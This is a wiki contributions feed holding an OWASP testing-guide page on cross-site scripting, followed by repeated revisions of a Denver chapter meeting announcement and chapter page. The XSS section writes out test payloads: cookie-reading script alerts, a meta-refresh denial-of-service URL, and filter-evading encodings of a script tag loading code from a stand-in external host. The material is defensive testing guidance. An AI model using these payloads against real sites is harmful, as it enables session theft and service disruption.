https://wiki.owasp.org/api.php?action=feedcontributions&feedformat=atom&user=EdupreyOWASP - User contributions [en]2026-04-23T00:24:49ZUser contributionsMediaWiki 1.27.2https://wiki.owasp.org/index.php?title=Testing_for_Cross_site_scripting&diff=114669Testing for Cross site scripting2011-07-27T19:26:05Z<p>Eduprey: </p>
<hr />
<div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]<br><br />
{{Template:OWASP Testing Guide v2}}<br />
<br />
== Overview ==<br />
[[Cross-site Scripting (XSS)]] attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.<br />
<br />
==Related Security Activities==<br />
<br />
===Description of Cross-site scripting Vulnerabilities===<br />
<br />
See the OWASP articles on [[Cross-site Scripting (XSS)]] Vulnerabilities and [[DOM Based XSS]].<br />
<br />
===How to Avoid Cross-site scripting Vulnerabilities===<br />
<br />
See the [[:Category:OWASP Guide Project|OWASP Guide]] article on [[Phishing|Phishing]].<br />
<br />
===How to Review Code for Cross-site scripting Vulnerabilities===<br />
<br />
See the [[:Category:OWASP Code Review Project|OWASP Code Review Guide]] article on how to [[Reviewing Code for Cross-site scripting|Reviewing code for Cross-site scripting]] Vulnerabilities.<br />
<br />
[[Category:Security Focus Area]]<br />
__NOTOC__<br />
== Description of the Issue ==<br />
[[Category:FIXME|I think this whole section needs to be deleted]]<br />
<br />
[[XSS]] attacks are essentially code injection attacks into the various interpreters in the browser. These attacks can be carried out using HTML, JavaScript, VBScript, ActiveX, Flash, and other client-side languages. These attacks also have the ability to gather data from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible. In some cases, Cross Site Scripting vulnerabilities can perform other functions such as scanning for other vulnerabilities and performing a Denial of Service on your web server.<br />
<br />
Cross Site Scripting is an attack on the privacy of clients of a particular web site which can lead to a total breach of security when customer details are stolen or manipulated. Unlike most attacks, which involve two parties (the attacker and the web site, or the attacker and the victim client) the XSS attack involves three parties -- the attacker, a client and the web site. The goal of the XSS attack is to steal the client cookies or any other sensitive information which can authenticate the client to the web site. With the token of the legitimate user at hand, the attacker can proceed to act as the user in his/her interaction with the site, impersonating the user - Identity theft!<br />
<br />
Online message boards, web logs, guestbooks, and user forums where messages can be permanently stored also facilitate Cross Site Scripting attacks. In these cases, an attacker can post a message to the board with a link to a seemingly harmless site, which subtly encodes a script that attacks the user once they click the link. Attackers can use a wide range of encoding techniques to hide or obfuscate the malicious script and, in some cases, can avoid explicit use of the <Script> tag. Typically, XSS attacks involve malicious JavaScript, but they can also involve any type of executable active content. Although the types of attacks vary in sophistication, there is a generally reliable method to detect XSS vulnerabilities. Cross Site Scripting is used in many Phishing attacks.<br />
<br />
'''Now we explain the three types of Cross Site Scripting: Stored, Reflected, and DOM-Based.'''<br />
<br />
The '''Stored Cross Site Scripting''' vulnerability is the most powerful kind of XSS attack. A Stored XSS vulnerability exists when data provided to a web application by a user is first stored persistently on the server (in a database, filesystem, or other location), and later displayed to users in a web page without being encoded using HTML entity encoding. A real life example of this would be the Samy MySpace Worm, which exploited an XSS vulnerability found on MySpace in October of 2005.<br />
<br />
These vulnerabilities are the most significant of the XSS types because an attacker can inject the script just once. This could potentially hit a large number of other users with little need for social engineering, or the web application could even be infected by a cross-site scripting virus.<br />
<br />
'''Example'''<br />
<br />
If we have a site that permits us to leave a message to the other user (a lesson of WebGoat v3.7), and we inject a script insted of a message in the following way:<br />
<br />
<center>[[Image:XSSStored1.PNG]]</center><br />
<br />
Now the server will store this information and when a user clicks on our fake message, his browser will execute our script as follows:<br />
<br />
<center>[[Image:XSSStored2.PNG]]</center><br />
<br />
The '''Reflected Cross-Site Scripting''' vulnerability is by far the most common and well-known type. These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user. If unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page. A classic example of this is in site search engines: if one searches for a string which includes some HTML special characters, often the search string will be redisplayed on the result page to indicate what was searched for, or will at least include the search terms in the text box for easier editing. If all occurrences of the search terms are not HTML entity encoded, an XSS hole will result.<br />
<br />
At first glance, this does not appear to be a serious problem since users can only inject code into their own pages. However, with a small amount of social engineering, an attacker could convince a user to follow a malicious URL which injects code into the results page, giving the attacker full access to that page's content. Due to the general requirement of the use of some social engineering in this case (and normally in DOM-Based XSS vulnerabilities as well), many programmers have disregarded these holes as not terribly important. This misconception is sometimes applied to XSS holes in general (even though this is only one type of XSS) and there is often disagreement in the security community as to the importance of cross-site scripting vulnerabilities. The simplest way to show the importance of a XSS vulnerability would be to perform a Denial of Service attack.<br />
In some cases a Denial of Service attack can be performed on the server by doing the following: <br />
<br />
article.php?title=<meta%20http-equiv="refresh"%20content="0;"><br />
<br />
This makes a refresh request roughly about every .3 seconds to particular page. It then acts like an infinite loop of refresh requests, potentially bringing down the web and database server by flooding it with requests. The more browser sessions that are open, the more intense the attack becomes. <br />
<br />
The '''DOM-based Cross-Site Scripting''' problem exists within a page's client-side script itself. If the JavaScript accesses a URL request parameter (an example would be an RSS feed) and uses this information to write some HTML to its own page, and this information is not encoded using HTML entities, an XSS vulnerability will likely be present, since this written data will be re-interpreted by browsers as HTML which could include additional client-side script.<br />
Exploiting such a hole would be very similar to the exploitation of Reflected XSS vulnerabilities, except in one very important situation. <br />
<br />
For example, if an attacker hosts a malicious website which contains a link to a vulnerable page on a client's local system, a script could be injected and would run with privileges of that user's browser on their system. This bypasses the entire client-side sandbox, not just the cross-domain restrictions that are normally bypassed with XSS exploits.<br />
<br />
The methods of injection can vary a great deal. A perfect example of how this type of an attack could impact an organization, instead of an individual, was demonstrated by Jeremiah Grossman @ BlackHat USA 2006. The demonstration gave an example of how posting a stored XSS script to a popular blog, newspaper, or page comments section of a website can cause all the visitors of that page to have their internal networks scanned and logged for a particular type of vulnerability.<br />
<br />
==Black Box testing and example==<br />
<br />
One way to test for XSS vulnerabilities is to verify whether an application or web server will respond to requests containing simple scripts with an HTTP response that could be executed by a browser. For example, Sambar Server (version 5.3) is a popular freeware web server with known XSS vulnerabilities. Sending the server a request such as the following generates a response from the server that will be executed by a web browser:<BR><br />
<br />
<nowiki>http://server/cgi-bin/testcgi.exe?<SCRIPT>alert(“Cookie”+document.cookie)</SCRIPT></nowiki><br />
<br />
The script is executed by the browser because the application generates an error message containing the original script, and the browser interprets the response as an executable script originating from the server.<br />
All web servers and web applications are potentially vulnerable to this type of misuse, and preventing such attacks is extremely difficult.<br />
<br />
'''Example 1:'''<br />
<br />
Since JavaScript is case sensitive, some people attempt to filter XSS by converting all characters to upper case, rendering Cross Site Scripting utilizing inline JavaScript useless. If this is the case, you may want to use VBScript since it is not a case sensitive language.<br />
<br />
JavaScript: <br />
<br />
<script>alert(document.cookie);</script><br />
<br />
VBScript: <br />
<br />
<script type="text/vbscript">alert(DOCUMENT.COOKIE)</script><br />
<br />
Also, you can use the SRC attribute to load the attacker's JavaScript from an external site (see Example 2 below), causing the JavaScript payload to be loaded directly and bypassing capitalization effects altogether.<br />
<br />
'''Example 2:'''<br />
<br />
If they are filtering for the < or the open of <script or closing of script> you should try various methods of encoding:<br />
<br />
<nowiki><script src=http://www.example.com/malicious-code.js></script></nowiki><br />
<br />
<nowiki>%3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e</nowiki><br />
<br />
<nowiki>\x3cscript src=http://www.example.com/malicious-code.js\x3e\x3c/script\x3e</nowiki><br />
<br />
You can find more examples of XSS Injection here: http://www.owasp.org/index.php/OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors<br />
<br />
== References ==<br />
<br />
<br />
'''Whitepapers'''<br><br />
<br />
* RSnake: "XSS (Cross Site Scripting) Cheat Sheet" - http://ha.ckers.org/xss.html<br />
<br />
* Jeremiah Grossman: "Hacking Intranet Websites from the Outside "JavaScript malware just got a lot more dangerous"" - http://www.blackhat.com/presentations/bh-jp-06/BH-JP-06-Grossman.pdf<br />
<br />
* Amit Klien: "DOM Based Cross Site Scripting" - http://www.securiteam.com/securityreviews/5MP080KGKW.html<br />
<br />
* Paul Lindner: "Preventing Cross-site Scripting Attacks" - http://www.perl.com/pub/a/2002/02/20/css.html<br />
<br />
* CERT: "CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests" - http://www.cert.org/advisories/CA-2000-02.html<br />
<br />
* Aung Khant: "What XSS Can do - Benefits of XSS From Attacker's view" - http://yehg.net/lab/pr0js/papers/What%20XSS%20Can%20Do.pdf<br />
<br />
<br />
'''Tools'''<br />
<br />
* '''OWASP CAL9000''' - http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project<br />
CAL9000 includes a sortable implementation of RSnake's XSS Attacks, Character Encoder/Decoder, HTTP Request Generator and Response Evaluator, Testing Checklist, Automated Attack Editor and much more. It's hosted at http://yehg.net/lab/pr0js/pentest/CAL9000/ .<br />
<br />
* '''PHP Charset Encoder(PCE)''' - http://yehg.net/encoding<br />
PCE helps you encode arbitrary texts to and from 65 kinds of charsets that you can use in your customized payloads. <br />
<br />
* '''HackVector(HVR)''' - http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php<br />
<br />
<br />
{{Category:OWASP Testing Project AoC}}</div>Edupreyhttps://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&diff=89742Denver September 2010 meeting2010-09-21T17:44:26Z<p>Eduprey: </p>
<hr />
<div>== Wednesday 22 September 2010, 6pm @ [http://maps.google.com/maps?f=q&source=s_q&hl=en&q=hosting.com&sll=39.699262,-104.986725&sspn=0.159814,0.258522&ie=UTF8&radius=8.24&split=1&rq=1&ev=zi&hq=hosting.com&hnear=&ll=39.699262,-104.986725&spn=0.159814,0.258522&z=12&iwloc=A Hosting.com] [http://denverowasp.eventbrite.com/ RSVP Now!] ==<br />
<br />
=== Eric Duprey: "Application Vulnerability Shooting Gallery" ===<br />
''How vulnerabilities make it into your business applications, how to find them, and how to kill them - Laptop recommended''<br />
<br />
<br />
Despite years of publicity, the common classes of web application vulnerabilities remain essentially unchanged. Lists of the most common and important vulnerabilities in application software (the OWASP Top 10, for example) are nearly identical from 2003 to today, and the prevalence of these vulnerabilities remains alarmingly high. One thing that is still clearly lacking is awareness of common and serious vulnerabilities, how they are detected, how they are exploited, and how they can be systematically eliminated.<br />
<br />
<br />
This is a hands-on presentation which will demonstrate common vulnerabilities in various real-world-like applications. It will cover discovering vulnerabilities at runtime, identifying them in source code, and uniform ways to fix these vulnerabilities using open and freely available tools.<br />
<br />
<br />
(It is recommended to bring a laptop to this event if possible -- while it is possible to gain benefit from the presentation without it, having a laptop present will enable you to jump into hands-on tactical examples in real-time)<br />
<br />
<br />
Presenter: '''Eric Duprey'''<br />
<br />
Eric Duprey is the co-chapter-leader of the Denver OWASP Chapter and a Senior Security Consultant with FishNet Security. For several years, Eric has been performing application security assessments, penetration testing and source code review for major enterprise companies and working with application developers to remediate vulnerable code. Eric has presented talks at major security conferences including DEFCON and SANS penetration testing summit.<br />
<br />
=== Agenda ===<br />
* 6pm: Pizza & pop, sponsored by FishNet Security<br />
* 6:30pm: Introduction and Chapter business<br />
* 6:45pm --> 8pm: Presentation<br />
* 8pm and later: Beer and ping pong hosted by Hosting.com<br />
<br />
[https://www.owasp.org/index.php/Denver Back to OWASP Denver]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&diff=89318Denver September 2010 meeting2010-09-15T01:40:02Z<p>Eduprey: </p>
<hr />
<div>== Wednesday 22 September 2010, 6pm @ [http://maps.google.com/maps?f=q&source=s_q&hl=en&q=hosting.com&sll=39.699262,-104.986725&sspn=0.159814,0.258522&ie=UTF8&radius=8.24&split=1&rq=1&ev=zi&hq=hosting.com&hnear=&ll=39.699262,-104.986725&spn=0.159814,0.258522&z=12&iwloc=A Hosting.com] [http://denverowasp.eventbrite.com/ RSVP Now!] ==<br />
<br />
=== Eric Duprey: "Application Vulnerability Shooting Gallery" ===<br />
''How vulnerabilities make it into your business applications, how to find them, and how to kill them - Laptop recommended''<br />
<br />
<br />
Despite years of publicity, the common classes of web application vulnerabilities remain essentially unchanged. Lists of the most common and important vulnerabilities in application software (the OWASP Top 10, for example) are nearly identical from 2003 to today, and the prevalence of these vulnerabilities remains alarmingly high. One thing that is still clearly lacking is awareness of common and serious vulnerabilities, how they are detected, how they are exploited, and how they can be systematically eliminated.<br />
<br />
<br />
This is a hands-on presentation which will demonstrate common vulnerabilities in various real-world-like applications. It will cover discovering vulnerabilities at runtime, identifying them in source code, and uniform ways to fix these vulnerabilities using open and freely available tools.<br />
<br />
<br />
(It is recommended to bring a laptop to this event if possible -- while it is possible to gain benefit from the presentation without it, having a laptop present will enable you to jump into hands-on tactical examples in real-time)<br />
<br />
<br />
Presenter: '''Eric Duprey'''<br />
<br />
Eric Duprey is the co-chapter-leader of the Denver OWASP Chapter. For several years, Eric has been performing application security assessments, penetration testing and source code review for major enterprise companies and working with application developers to remediate vulnerable code. Eric has presented talks at major security conferences including DEFCON and SANS penetration testing summit.<br />
<br />
=== Agenda ===<br />
* 6pm: Pizza & pop, sponsored by FishNet Security<br />
* 6:30pm: Introduction and Chapter business<br />
* 6:45pm --> 8pm: Presentation<br />
* 8pm and later: Beer and ping pong hosted by Hosting.com<br />
<br />
[https://www.owasp.org/index.php/Denver Back to OWASP Denver]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&diff=89317Denver September 2010 meeting2010-09-15T01:38:26Z<p>Eduprey: </p>
<hr />
<div>== Wednesday 22 September 2010, 6pm @ [http://maps.google.com/maps?f=q&source=s_q&hl=en&q=hosting.com&sll=39.699262,-104.986725&sspn=0.159814,0.258522&ie=UTF8&radius=8.24&split=1&rq=1&ev=zi&hq=hosting.com&hnear=&ll=39.699262,-104.986725&spn=0.159814,0.258522&z=12&iwloc=A Hosting.com] [http://denverowasp.eventbrite.com/ RSVP Now!] ==<br />
<br />
=== Eric Duprey: "Application Vulnerability Shooting Gallery" ===<br />
''How vulnerabilities make it into your business applications, how to find them, and how to kill them - Laptop recommended''<br />
<br />
<br />
Despite years of publicity, the common classes of web application vulnerabilities remain essentially unchanged. Lists of the most common and important vulnerabilities in application software (the OWASP Top 10, for example) are nearly identical from 2003 to today, and the prevalence of these vulnerabilities remains alarmingly high. One thing that is still clearly lacking is awareness of common and serious vulnerabilities, how they are detected, how they are exploited, and how they can be systematically eliminated.<br />
<br />
<br />
This is a hands-on presentation which will demonstrate common vulnerabilities in various real-world-like applications. It will cover discovering vulnerabilities at runtime, identifying them in source code, and uniform ways to fix these vulnerabilities using open and freely available tools.<br />
<br />
<br />
(It is recommended to bring a laptop to this event if possible -- while it is possible to gain benefit from the presentation without it, having a laptop present will enable you to jump into hands-on tactical examples in real-time)<br />
<br />
<br />
Presenter: '''Eric Duprey'''<br />
<br />
Eric Duprey is the co-chapter-leader of the Denver OWASP Chapter. For several years, Eric has been performing application security assessments, penetration testing and source code review for major enterprise companies and working with application developers to remediate vulnerable code. Eric has presented talks at major security conferences including DEFCON and SANS penetration testing summit.<br />
<br />
=== Agenda ===<br />
* 6pm: Pizza & pop, sponsored by FishNet Security<br />
* 6:30pm: Introduction and Chapter business<br />
* 6:45pm --> 8pm: Presentation<br />
* 8pm onward: Beer and ping pong hosted by Hosting.com<br />
<br />
[https://www.owasp.org/index.php/Denver Back to OWASP Denver]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Denver&diff=89316Denver2010-09-15T01:21:59Z<p>Eduprey: </p>
<hr />
<div>{{Chapter Template|chaptername=Denver|extra=Chapter leaders are [mailto:eduprey@gmail.com Eric Duprey] and [mailto:dcampbell@owasp.org David Campbell]. |mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-denver|emailarchives=http://lists.owasp.org/pipermail/owasp-denver}}<br />
<br />
==== Local News ====<br />
<br />
=====Next Chapter Meeting: [http://denverowasp.eventbrite.com/ RSVP Now!]=====<br />
[[Denver September 2010 meeting|September 22nd 2010: Eric Duprey: Application Vulnerability Shooting Gallery]]<br />
<br />
Next Denver meeting is scheduled for Wed, 22 Aug 2010 at an all new central Denver location. We've heard your gripes that Raytheon and Dish are too far south, and thanks to the fine folks at Hosting.com are pleased to be hosting our September meeting much closer to downtown, but with free parking! (and, for this meeting, free beer!)<br />
<br />
<!-- We have had several people ask that our next chapter meeting be a walkthrough of the FROC2010 CTF. We are looking at Wed, 21 July 2010 for this event in a new location near downtown Denver (though with free parking!).<br />
<br />
We are also looking at doing a static analysis working group. Due to the [http://www.theregister.co.uk/2010/04/21/white_house_open_sources_code/ hype] surrounding the recent adoption of Drupal by the White House and the [http://www.theregister.co.uk/2010/05/10/drupal_security_bug/ row] that ensued when an XSS flaw was found recently, OWASP is keen to help.<br />
<br />
Our friends at [http://www.fortify.com/ Fortify Software] and a [http://drupal.org/user/36762 local] OWASP'er who is also a member of the Drupal Security team have proposed that our next meeting be a half day working session to perform static analysis and verification on Drupal.<br />
<br />
Interested? Let us know. Tweet with hashtag #owasp303 or email us at froc@owasp.org. --><br />
<br />
=====Front Range OWASP Conference (FROC 2010) =====<br />
[[Front_Range_OWASP_Conference_2010|FROC 2010]] was a sellout success! Thanks for your support. The [http://www.surveymonkey.com/sr.aspx?sm=Fn2UBK3eyju0z2k3B8XpvHvs9s_2bdRO1BS428Of_2f9ZA0_3d survey results] are now posted.<br />
<br />
<br />
<br />
=====OWASP Podcast=====<br />
[http://www.owasp.org/index.php/OWASP_Podcast OWASP Podcast]<br />
<br />
<br />
<paypal>Denver</paypal><br />
<hr><br />
<br />
==Questions, Comments==<br />
Questions can be directed to <br />
<br />
*David Campbell, Denver OWASP: dcampbell 'at' owasp.org<br />
*Eric Duprey, Denver OWASP: eduprey 'at' exploits.org<br />
<br />
<hr><br />
<br />
<br />
==== Chapter Meetings ====<br />
<br />
== Future Meetings == <br />
<!-- TBD<br />
<br />
We have had several people ask that our next chapter meeting be a walkthrough of the FROC2010 CTF. We are looking at Wed, 21 July 2010 for this event in a new location near downtown Denver (though with free parking!).<br />
<br />
We are also looking at doing a static analysis working group. Due to the [http://www.theregister.co.uk/2010/04/21/white_house_open_sources_code/ hype] surrounding the recent adoption of Drupal by the White House and the [http://www.theregister.co.uk/2010/05/10/drupal_security_bug/ row] that ensued when an XSS flaw was found recently, OWASP is keen to help.<br />
<br />
Our friends at [http://www.fortify.com/ Fortify Software] and a [http://drupal.org/user/36762 local] OWASP'er who is also a member of the Drupal Security team have proposed that our next meeting be a half day working session to perform static analysis and verification on Drupal.<br />
<br />
Interested? Let us know. Tweet with hashtag #owasp303 or email us at froc@owasp.org. --><br />
<br />
[[Denver September 2010 meeting|September 22nd 2010: Eric Duprey: Application Vulnerability Shooting Gallery]]<br />
<br />
== Past Meetings ==<br />
[[Denver August 2010 meeting|August 18th 2010: Clint Pollock: Protecting Your Applications from Backdoors]]<br />
<br />
[[Front_Range_OWASP_Conference_2010|June 2nd 2010: Front Range OWASP Conference]]<br />
<br />
[[Denver January 2010 meeting|January 20th 2010: John Evans: Securing Webapps: An Illustrative Overview]]<br />
<br />
[[Denver November 2009 meeting|November 18th 2009: Anton Rager: Advanced XSS]]<br />
<br />
[[Denver August 2009 meeting|August 27th 2009: Jon Rose: Security in the Clouds]]<br />
<br />
[[Denver May 2009 meeting|May 2009: Dr. Joseph McComb & and Daniel Weiske: Compliance and application security testing]]<br />
<br />
[[Front_Range_OWASP_Conference_2009|March 2009: Front Range OWASP Conference (SnowFROC)]]<br />
<br />
[[Denver January 2009 meeting|January 2009: David Campbell & Eric Duprey: Guided Tour: AppSec NYC '08 CTF]]<br />
<br />
[[Denver October 2008 meeting|October 2008: Alex Smolen: The OWASP ASP .NET ESAPI]]<br />
<br />
[[Denver September 2008 meeting|September 2008: John Dickson: Black Box vs. White Box: Different App Testing Strategies]]<br />
<br />
[[Denver August 2008 meeting|August 2008: Dan Cornell: Static Analysis]]<br />
<br />
[[Denver July 2008 meeting|July 2008: David Byrne & Eric Duprey: Grendel-Scan]]<br />
<br />
[[Front Range OWASP Conference|June 2008: Front Range OWASP Conference: Jeremiah Grossman, Robert Hansen, and more!]]<br />
<br />
[[Denver May 2008 meeting|May 2008: David Campbell & Eric Duprey: XSS Attacks & Defenses]]<br />
<br />
[[Denver April 2008 meeting|April 2008: Ryan Barnett: Virtual Patching with ModSecurity]]<br />
<br />
[[Denver February 2008 meeting|February 2008: Michael Sutton: SQL Injection Revisited]]<br />
<br />
[[Denver June 2007 meeting|June 2007]]<br />
<br />
[[Denver April 2007 meeting|April 2007]]<br />
<br />
[[Denver February 2007 meeting|February 2007]]<br />
<br />
[[Denver January 2007 meeting|January 2007]]<br />
<br />
[[Denver November 2006 meeting|November 2006]]<br />
<br />
==[[Related_Organizations|Local Organizations of Interest]]==<br />
<br />
==== Mailing List ====<br />
Join the [http://lists.owasp.org/mailman/listinfo/owasp-denver OWASP Denver Mailing List] to receive meeting notifications via email<br />
<br />
==== Twitter Feed @owasp303 ====<br />
Denver OWASP has created a [http://twitter.com/owasp303 Twitter feed @owasp303] to keep you in the loop. Whilst the mailing list is primarily intended to be low-traffic and only provide updates regarding the times, locations, and topics for chapter meetings, the Twitter feed will also provide noteworthy appsec updates.<br />
<br />
{|<br />
|-<br />
| style="border: 1px solid rgb(204, 204, 204); width: 100%; font-size: 95%; color: rgb(0, 0, 0); background-color: rgb(236, 236, 236);" | <br />
<br />
'''@OWASP303 Twitter Feed ([http://twitter.com/OWASP303 follow us on Twitter!])'''<br />
<twitter>55021150</twitter> <br />
<br />
| style="width: 110px; font-size: 95%; color: rgb(0, 0, 0);" | <br />
|}<br />
<br />
<br />
<br />
====Resources====<br />
<br />
=====Denver OWASP Chapter Leaders=====<br />
*David Campbell, Denver OWASP: dcampbell 'at' owasp.org<br />
*Eric Duprey, Denver OWASP: eduprey 'at' exploits.org<br />
<br />
=====Key OWASP Resources=====<br />
* http://www.owasp.org/images/4/41/ASVS_One_Page_Handout.pdf<br />
* http://www.owasp.org/images/3/31/ESAPI_One_Page_Handout.pdf<br />
* http://www.owasp.org/images/a/a1/Legal_One_Page_Handout.pdf<br />
* <br />
* http://www.owasp.org/images/a/a3/How_ESAPI_Works.pdf<br />
* http://www.owasp.org/images/a/ac/LAMP_Should_be_Spelled_LAMPE.pdf<br />
* http://www.owasp.org/images/0/01/Getting_started_designing_for_a_level_of_assurance.pdf<br />
* <br />
* http://www.owasp.org/index.php/Agile_Software_Development:_Don%27t_Forget_EVIL_User_Stories<br />
* http://www.owasp.org/index.php/Man_vs._Code<br />
* <br />
* http://www.owasp.org/images/4/4e/OWASP_ASVS_2009_Web_App_Std_Release.pdf<br />
* <br />
* http://www.owasp.org/images/c/cd/PHP-ESAPI_1.0a_install.pdf<br />
* http://www.owasp.org/images/6/67/PHP-ESAPI_1.0a_ReleaseNotes.pdf<br />
<br />
=====Chapter Management Links=====<br />
[[Pizza|Best pizza in Centennial]]<br />
__NOTOC__<br />
<headertabs/><br />
[[Category:OWASP Chapter]]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Denver&diff=89315Denver2010-09-15T01:21:28Z<p>Eduprey: </p>
<hr />
<div>{{Chapter Template|chaptername=Denver|extra=Chapter leaders are [mailto:eduprey@gmail.com Eric Duprey] and [mailto:dcampbell@owasp.org David Campbell]. |mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-denver|emailarchives=http://lists.owasp.org/pipermail/owasp-denver}}<br />
<br />
==== Local News ====<br />
<br />
=====Next Chapter Meeting: [http://denverowasp.eventbrite.com/ RSVP Now!]=====<br />
[[Denver September 2010 meeting|September 22nd 2010: Eric Duprey: Application Vulnerability Shooting Gallery]]<br />
<br />
Next Denver meeting is scheduled for Wed, 22 Aug 2010 at an all new central Denver location. We've heard your gripes that Raytheon and Dish are too far south, and thanks to the fine folks at Hosting.com are pleased to be hosting our August meeting much closer to downtown, but with free parking! (and, for this meeting, free beer!)<br />
<br />
<!-- We have had several people ask that our next chapter meeting be a walkthrough of the FROC2010 CTF. We are looking at Wed, 21 July 2010 for this event in a new location near downtown Denver (though with free parking!).<br />
<br />
We are also looking at doing a static analysis working group. Due to the [http://www.theregister.co.uk/2010/04/21/white_house_open_sources_code/ hype] surrounding the recent adoption of Drupal by the White House and the [http://www.theregister.co.uk/2010/05/10/drupal_security_bug/ row] that ensued when an XSS flaw was found recently, OWASP is keen to help.<br />
<br />
Our friends at [http://www.fortify.com/ Fortify Software] and a [http://drupal.org/user/36762 local] OWASP'er who is also a member of the Drupal Security team have proposed that our next meeting be a half day working session to perform static analysis and verification on Drupal.<br />
<br />
Interested? Let us know. Tweet with hashtag #owasp303 or email us at froc@owasp.org. --><br />
<br />
=====Front Range OWASP Conference (FROC 2010) =====<br />
[[Front_Range_OWASP_Conference_2010|FROC 2010]] was a sellout success! Thanks for your support. The [http://www.surveymonkey.com/sr.aspx?sm=Fn2UBK3eyju0z2k3B8XpvHvs9s_2bdRO1BS428Of_2f9ZA0_3d survey results] are now posted.<br />
<br />
<br />
<br />
=====OWASP Podcast=====<br />
[http://www.owasp.org/index.php/OWASP_Podcast OWASP Podcast]<br />
<br />
<br />
<paypal>Denver</paypal><br />
<hr><br />
<br />
==Questions, Comments==<br />
Questions can be directed to <br />
<br />
*David Campbell, Denver OWASP: dcampbell 'at' owasp.org<br />
*Eric Duprey, Denver OWASP: eduprey 'at' exploits.org<br />
<br />
<hr><br />
<br />
<br />
==== Chapter Meetings ====<br />
<br />
== Future Meetings == <br />
<!-- TBD<br />
<br />
We have had several people ask that our next chapter meeting be a walkthrough of the FROC2010 CTF. We are looking at Wed, 21 July 2010 for this event in a new location near downtown Denver (though with free parking!).<br />
<br />
We are also looking at doing a static analysis working group. Due to the [http://www.theregister.co.uk/2010/04/21/white_house_open_sources_code/ hype] surrounding the recent adoption of Drupal by the White House and the [http://www.theregister.co.uk/2010/05/10/drupal_security_bug/ row] that ensued when an XSS flaw was found recently, OWASP is keen to help.<br />
<br />
Our friends at [http://www.fortify.com/ Fortify Software] and a [http://drupal.org/user/36762 local] OWASP'er who is also a member of the Drupal Security team have proposed that our next meeting be a half day working session to perform static analysis and verification on Drupal.<br />
<br />
Interested? Let us know. Tweet with hashtag #owasp303 or email us at froc@owasp.org. --><br />
<br />
[[Denver September 2010 meeting|September 22nd 2010: Eric Duprey: Application Vulnerability Shooting Gallery]]<br />
<br />
== Past Meetings ==<br />
[[Denver August 2010 meeting|August 18th 2010: Clint Pollock: Protecting Your Applications from Backdoors]]<br />
<br />
[[Front_Range_OWASP_Conference_2010|June 2nd 2010: Front Range OWASP Conference]]<br />
<br />
[[Denver January 2010 meeting|January 20th 2010: John Evans: Securing Webapps: An Illustrative Overview]]<br />
<br />
[[Denver November 2009 meeting|November 18th 2009: Anton Rager: Advanced XSS]]<br />
<br />
[[Denver August 2009 meeting|August 27th 2009: Jon Rose: Security in the Clouds]]<br />
<br />
[[Denver May 2009 meeting|May 2009: Dr. Joseph McComb & and Daniel Weiske: Compliance and application security testing]]<br />
<br />
[[Front_Range_OWASP_Conference_2009|March 2009: Front Range OWASP Conference (SnowFROC)]]<br />
<br />
[[Denver January 2009 meeting|January 2009: David Campbell & Eric Duprey: Guided Tour: AppSec NYC '08 CTF]]<br />
<br />
[[Denver October 2008 meeting|October 2008: Alex Smolen: The OWASP ASP .NET ESAPI]]<br />
<br />
[[Denver September 2008 meeting|September 2008: John Dickson: Black Box vs. White Box: Different App Testing Strategies]]<br />
<br />
[[Denver August 2008 meeting|August 2008: Dan Cornell: Static Analysis]]<br />
<br />
[[Denver July 2008 meeting|July 2008: David Byrne & Eric Duprey: Grendel-Scan]]<br />
<br />
[[Front Range OWASP Conference|June 2008: Front Range OWASP Conference: Jeremiah Grossman, Robert Hansen, and more!]]<br />
<br />
[[Denver May 2008 meeting|May 2008: David Campbell & Eric Duprey: XSS Attacks & Defenses]]<br />
<br />
[[Denver April 2008 meeting|April 2008: Ryan Barnett: Virtual Patching with ModSecurity]]<br />
<br />
[[Denver February 2008 meeting|February 2008: Michael Sutton: SQL Injection Revisited]]<br />
<br />
[[Denver June 2007 meeting|June 2007]]<br />
<br />
[[Denver April 2007 meeting|April 2007]]<br />
<br />
[[Denver February 2007 meeting|February 2007]]<br />
<br />
[[Denver January 2007 meeting|January 2007]]<br />
<br />
[[Denver November 2006 meeting|November 2006]]<br />
<br />
==[[Related_Organizations|Local Organizations of Interest]]==<br />
<br />
==== Mailing List ====<br />
Join the [http://lists.owasp.org/mailman/listinfo/owasp-denver OWASP Denver Mailing List] to receive meeting notifications via email<br />
<br />
==== Twitter Feed @owasp303 ====<br />
Denver OWASP has created a [http://twitter.com/owasp303 Twitter feed @owasp303] to keep you in the loop. Whilst the mailing list is primarily intended to be low-traffic and only provide updates regarding the times, locations, and topics for chapter meetings, the Twitter feed will also provide noteworthy appsec updates.<br />
<br />
{|<br />
|-<br />
| style="border: 1px solid rgb(204, 204, 204); width: 100%; font-size: 95%; color: rgb(0, 0, 0); background-color: rgb(236, 236, 236);" | <br />
<br />
'''@OWASP303 Twitter Feed ([http://twitter.com/OWASP303 follow us on Twitter!])'''<br />
<twitter>55021150</twitter> <br />
<br />
| style="width: 110px; font-size: 95%; color: rgb(0, 0, 0);" | <br />
|}<br />
<br />
<br />
<br />
====Resources====<br />
<br />
=====Denver OWASP Chapter Leaders=====<br />
*David Campbell, Denver OWASP: dcampbell 'at' owasp.org<br />
*Eric Duprey, Denver OWASP: eduprey 'at' exploits.org<br />
<br />
=====Key OWASP Resources=====<br />
* http://www.owasp.org/images/4/41/ASVS_One_Page_Handout.pdf<br />
* http://www.owasp.org/images/3/31/ESAPI_One_Page_Handout.pdf<br />
